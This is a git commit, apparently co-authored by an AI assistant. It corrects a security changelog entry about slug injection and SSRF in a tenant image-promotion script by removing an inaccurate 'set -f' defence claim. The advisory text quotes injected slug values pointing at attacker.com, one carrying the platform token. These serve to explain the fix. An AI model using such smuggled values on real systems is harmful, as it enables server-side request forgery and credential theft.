fix(security-changelog): remove inaccurate set -f clause from OFFSEC-006 entry

The validate_slug() RFC-1123 regex is the sole remediation. The
set -f "two-layer defence" description was inaccurate — set -f is
not present in promote-tenant-image.sh on main. Corrects per
technical-writer review guidance on docs#51.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

content/docs/security/changelog.md

@@ -20,14 +20,9 @@ This page documents security fixes shipped in the Molecule AI platform. Each ent
 
 `promote-tenant-image.sh` interpolated tenant slugs directly into URL paths and ECR repository identifiers without validation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could cause the platform to redirect HTTP calls to an attacker-controlled host (SSRF) and expose the platform's bearer token in the attacker's server access logs via the same URL parameter injection.
 
-Bash glob metacharacters (`*`, `?`, `[`) in slug values were subject to pathname expansion before being passed to curl, adding a secondary injection vector: a slug like `evil?url=https://attacker.com` would expand to a list of filenames before being interpolated into the URL.
-
 ### Fix
 
-Two-layer defence applied to `promote-tenant-image.sh`:
-
-1. **`set -f`** (script top): disables glob expansion, so `*`, `?`, and `[` are treated as literal characters.
-2. **`validate_slug()`**: new function using RFC-1123 regex (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`). Invalid slugs are rejected with exit code 64 before any network call is issued. Additionally, `validate_tenants()` is called after argument parsing and exits 64 on any tenant with an invalid slug.
+New `validate_slug()` function using RFC-1123 regex (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`). Invalid slugs are rejected with exit code 64 before any network call is issued. Additionally, `validate_tenants()` is called after argument parsing and exits 64 on any tenant with an invalid slug.
 
 ### User-facing summary